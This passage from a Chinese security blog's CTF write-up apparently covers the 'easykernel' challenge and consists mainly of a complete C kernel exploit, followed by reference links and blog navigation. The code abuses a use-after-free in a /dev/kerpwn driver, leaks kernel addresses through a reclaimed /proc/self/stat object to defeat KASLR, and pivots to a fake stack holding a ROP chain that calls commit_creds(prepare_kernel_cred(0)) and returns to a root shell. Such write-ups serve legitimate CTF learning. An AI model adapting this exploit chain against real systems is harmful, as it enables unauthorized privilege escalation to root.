class="string">&quot;m&quot;</span>(user_rflags), <span class="string">&quot;m&quot;</span>(user_cs)</span><br><span class="line">	);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">node</span>&#123;</span></span><br><span class="line">	<span class="keyword">size_t</span> idx;</span><br><span class="line">	<span class="keyword">size_t</span> len;</span><br><span class="line">	<span class="keyword">void</span> *buf;</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="keyword">int</span> fd;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">add</span><span class="params">(<span class="keyword">size_t</span> idx)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">return</span> ioctl(fd,<span class="number">0x20</span>,&amp;idx);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">show</span><span class="params">(struct node *nodep)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">return</span> ioctl(fd,<span class="number">0x40</span>,nodep);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">delete</span><span class="params">(<span class="keyword">size_t</span> idx)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">return</span> ioctl(fd,<span class="number">0x30</span>,&amp;idx);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">edit</span><span class="params">(struct node *nodep)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">return</span> ioctl(fd,<span class="number">0x50</span>,nodep);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">char</span> data[<span class="number">0x300</span>];</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">size_t</span> raw_vmlinux_base = <span class="number">0xffffffff81000000</span>;</span><br><span class="line">	signal(SIGSEGV, shell);</span><br><span class="line">	save_stat();</span><br><span class="line">	</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">&quot;[+]open drive\n&quot;</span>);</span><br><span class="line">	fd = open(<span class="string">&quot;/dev/kerpwn&quot;</span>,<span class="number">2</span>);</span><br><span class="line">	<span class="keyword">if</span> (fd &lt; <span class="number">0</span>) &#123;</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">&quot;[-] bad open device\n&quot;</span>);</span><br><span class="line">		<span class="built_in">exit</span>(<span class="number">-1</span>);</span><br><span class="line">	&#125;</span><br><span class="line">	</span><br><span class="line">	<span class="class"><span class="keyword">struct</span> <span class="title">node</span> <span class="title">node1</span>;</span></span><br><span class="line">	node1.buf = <span class="built_in">malloc</span>(<span class="number">0x100</span>);</span><br><span class="line">	node1.len = <span class="number">0x100</span>;</span><br><span class="line">	node1.idx = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">	add(<span class="number">0x20</span>);</span><br><span class="line">	<span class="keyword">delete</span>(<span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">	<span class="keyword">int</span> seq_fd = open(<span class="string">&quot;/proc/self/stat&quot;</span>, O_RDONLY);</span><br><span class="line">	<span class="keyword">if</span>(seq_fd &lt; <span class="number">0</span>)</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="built_in">puts</span>(<span class="string">&quot;[!] open failed&quot;</span>);</span><br><span class="line">		<span class="built_in">exit</span>(<span class="number">-1</span>);</span><br><span class="line">	&#125;</span><br><span class="line">	</span><br><span class="line">	show(&amp;node1);</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">&quot;[+] Leak address: \n&quot;</span>);</span><br><span class="line">	<span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i&lt;<span class="number">0x20</span>/<span class="number">8</span>;i++)&#123;</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">&quot;0x%lx\n&quot;</span>,*((<span class="keyword">size_t</span> *)node1.buf+i));</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">size_t</span> base=*((<span class="keyword">size_t</span> *)node1.buf)<span class="number">-0x319d30</span>;</span><br><span class="line">	<span class="keyword">size_t</span> offset = base - raw_vmlinux_base;</span><br><span class="line">	prepare_kernel_cred=base+prepare_kernel_cred;</span><br><span class="line">	commit_creds=base+commit_creds;</span><br><span class="line">	<span class="keyword">size_t</span> xchg_eax_esp = <span class="number">0xFFFFFFFF811C4878</span> + offset;</span><br><span class="line">	<span class="keyword">size_t</span> pop_rdi=<span class="number">0xFFFFFFFF811CAC04</span> + offset;;</span><br><span class="line">	<span class="keyword">size_t</span> pop_rdx=<span class="number">0xFFFFFFFF819131BA</span> + offset;</span><br><span class="line">	<span class="keyword">size_t</span> mov_rdi_rax=<span class="number">0xFFFFFFFF815B27CA</span> + offset;</span><br><span class="line">	<span class="keyword">size_t</span> swapgs=base+<span class="number">0xc010bc</span>;</span><br><span class="line">	<span class="keyword">size_t</span> iretq=base+<span class="number">0x3a2ab</span>;</span><br><span class="line">	</span><br><span class="line">	<span class="keyword">size_t</span> start = (xchg_eax_esp &amp; <span class="number">0xfff</span>) / <span class="number">8</span>;</span><br><span class="line">	<span class="keyword">size_t</span> *fake_stack = mmap(xchg_eax_esp &amp; <span class="number">0xfffff000</span>, <span class="number">0x2000</span>, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, <span class="number">-1</span>, <span class="number">0</span>);</span><br><span class="line">	<span class="keyword">if</span>(fake_stack != (xchg_eax_esp &amp; <span class="number">0xfffff000</span>))</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="built_in">puts</span>(<span class="string">&quot;[!] mmap failed&quot;</span>);</span><br><span class="line">		<span class="built_in">exit</span>(<span class="number">-1</span>);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">size_t</span> index = <span class="number">0</span>;</span><br><span class="line">	fake_stack[start + index++] = pop_rdi;</span><br><span class="line">    </span><br><span class="line">	fake_stack[start + index++] = <span class="number">0</span>;</span><br><span class="line">	fake_stack[start + index++] = prepare_kernel_cred;</span><br><span class="line">	fake_stack[start + index++] = pop_rdx;</span><br><span class="line">	fake_stack[start + index++] = <span class="number">0</span>;</span><br><span class="line">	fake_stack[start + index++] = mov_rdi_rax;</span><br><span class="line">	fake_stack[start + index++] = commit_creds;</span><br><span class="line">	fake_stack[start + index++] = swapgs;</span><br><span class="line">	fake_stack[start + index++] = <span class="number">0</span>;</span><br><span class="line">	fake_stack[start + index++] = iretq;</span><br><span class="line">	fake_stack[start + index++] = &amp;shell;</span><br><span class="line">	fake_stack[start + index++] = user_cs;</span><br><span class="line">	fake_stack[start + index++] = user_rflags;</span><br><span class="line">	fake_stack[start + index++] = user_sp;</span><br><span class="line">	fake_stack[start + index++] = user_ss;</span><br><span class="line">    </span><br><span class="line">	*((<span class="keyword">size_t</span> *)node1.buf)=(<span class="keyword">size_t</span>)xchg_eax_esp;</span><br><span class="line">	node1.len = <span class="number">0x8</span>;</span><br><span class="line">	node1.idx = <span class="number">0</span>;</span><br><span class="line">	edit(&amp;node1);</span><br><span class="line">    </span><br><span class="line">	read(seq_fd, data, <span class="number">1</span>);</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<blockquote>
<p><em>参考资料：</em></p>
<p><a target="_blank" rel="noopener" href="https://x1ng.top/2020/12/22/kernel-pwn%E5%85%A5%E9%97%A8%E4%B9%8B%E8%B7%AF-%E4%B8%80/">kernel pwn入门之路（一）</a></p>
<p><a target="_blank" rel="noopener" href="https://x1ng.top/2021/11/23/kernel-pwn%E5%85%A5%E9%97%A8%E4%B9%8B%E8%B7%AF-%E4%B8%89/">kernel pwn入门之路（三）</a></p>
<p><a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/kernel-mode/exploitation/rop/">Kernel ROP - CTF Wiki</a></p>
</blockquote>

      
    </div>
    
  </div>
  
    


    <nav id="article-nav">
        
            <div id="article-nav-newer" class="article-nav-title">
                <a href="/2021/12/07/UNCTF2021pwn-wp/">
                    UNCTF2021pwn-wp
                </a>
            </div>
        
        
            <div id="article-nav-older" class="article-nav-title">
                <a href="/2021/11/08/CVE-2021-30145-mpv/">
                    CVE-2021-30145分析与复现
                </a>
            </div>
        
    </nav>

  
</article>

    <div id="toc" class="toc-article">
        <strong class="toc-title">文章目录</strong>
        
            <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#string-go"><span class="toc-number">1.</span> <span class="toc-text">string_go</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE"><span class="toc-number">1.1.</span> <span class="toc-text">题目</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90"><span class="toc-number">1.2.</span> <span class="toc-text">漏洞分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B0%8F%E8%B4%B4%E5%A3%AB"><span class="toc-number">1.3.</span> <span class="toc-text">小贴士</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#EXP"><span class="toc-number">1.4.</span> <span class="toc-text">EXP</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#easykernel"><span class="toc-number">2.</span> <span class="toc-text">easykernel</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE-1"><span class="toc-number">2.1.</span> <span class="toc-text">题目</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-1"><span class="toc-number">2.2.</span> <span class="toc-text">漏洞分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B0%8F%E8%B4%B4%E5%A3%AB-1"><span class="toc-number">2.3.</span> <span class="toc-text">小贴士</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#EXP-1"><span class="toc-number">2.4.</span> <span class="toc-text">EXP</span></a></li></ol></li></ol>
        
    </div>
    <style>
        .left-col .switch-btn,
        .left-col .switch-area {
            display: none;
        }
        .toc-level-3 i,
        .toc-level-3 ol {
            display: none !important;
        }
    </style>

    <input type="button" id="tocButton" value="隐藏目录"  title="点击按钮隐藏或者显示文章目录">

    <script>
        yiliaConfig.toc = ["隐藏目录", "显示目录", !!"false"];
    </script>





    




    <div class="scroll" id="post-nav-button">
        
            <a href="/2021/12/07/UNCTF2021pwn-wp/" title="上一篇: UNCTF2021pwn-wp">
                <i class="fa fa-angle-left"></i>
            </a>
        

        <a title="文章列表"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>

        
            <a href="/2021/11/08/CVE-2021-30145-mpv/" title="下一篇: CVE-2021-30145分析与复现">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>

    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2022/02/16/fuzz%E4%B8%80%E4%B8%AA%E7%A8%8B%E5%BA%8FAFL%E9%83%BD%E5%81%9A%E4%BA%86%E4%BB%80%E4%B9%88/">fuzz一个程序AFL都做了什么</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/01/20/%E4%BB%8E%E4%B8%80%E9%81%93%E4%BE%8B%E9%A2%98%E5%AD%A6%E4%B9%A0QEMU%E9%80%83%E9%80%B8%E5%8E%9F%E7%90%86/">从一道例题学习QEMU逃逸原理</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/12/07/UNCTF2021pwn-wp/">UNCTF2021pwn-wp</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/11/23/%E8%A5%BF%E6%B9%96%E8%AE%BA%E5%89%912021pwn-wp/">西湖论剑2021pwn-wp</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/11/08/CVE-2021-30145-mpv/">CVE-2021-30145分析与复现</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/10/23/glibc-free%E5%8E%9F%E7%90%86%E5%8F%8A%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90/">glibc(2.26) free原理及源码分析</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/10/17/glibc-malloc%E5%8E%9F%E7%90%86%E5%8F%8A%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90/">glibc(2.26) malloc原理及源码分析</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/09/10/hello-world/">Hello World</a></li></ul>




    <script>
        
    </script>
</div>
      <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js">
</script>
<footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                <i class="fa fa-copyright"></i> 
                2021-2022 Cyyyber
            </div>
            <div class="footer-right">
                <a href="http://hexo.io/" target="_blank" title="快速、简洁且高效的博客框架">Hexo</a>  Theme <a href="https://github.com/MOxFIVE/hexo-theme-yelee" target="_blank" title="简而不减 Hexo 双栏博客主题  v3.5">Yelee</a> by MOxFIVE <i class="fa fa-heart animated infinite pulse"></i>
            </div>
        </div>
        
            <div class="visit">
                
                    <span id="busuanzi_container_site_pv" style='display:none'>
                        <span id="site-visit" title="本站到访数"><i class="fa fa-user" aria-hidden="true"></i><span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span>| </span>
                
                
                    <span id="busuanzi_container_page_pv" style='display:none'>
                        <span id="page-visit"  title="本页阅读量"><i class="fa fa-eye animated infinite pulse" aria-hidden="true"></i><span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        
    </div>
</footer>
    </div>
    
<script data-main="/js/main.js" src="//lib.baomitu.com/require.js/2.2.0/require.min.js"></script>





<div class="scroll" id="scroll">
    <a href="#" title="返回顶部"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments" onclick="load$hide();" title="查看评论"><i class="fa fa-comments-o"></i></a>
    <a href="#footer" title="转到底部"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    // Open in New Window
    
        var oOpenInNew = {
            
            
            
            
            
            
             archives: ".archive-article-title", 
             miniArchives: "a.post-list-link", 
            
             friends: "#js-friends a", 
             socail: ".social a" 
        }
        for (var x in oOpenInNew) {
            $(oOpenInNew[x]).attr("target", "_blank");
        }
    
</script>

<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
</script>
  </div>
</body>
</html>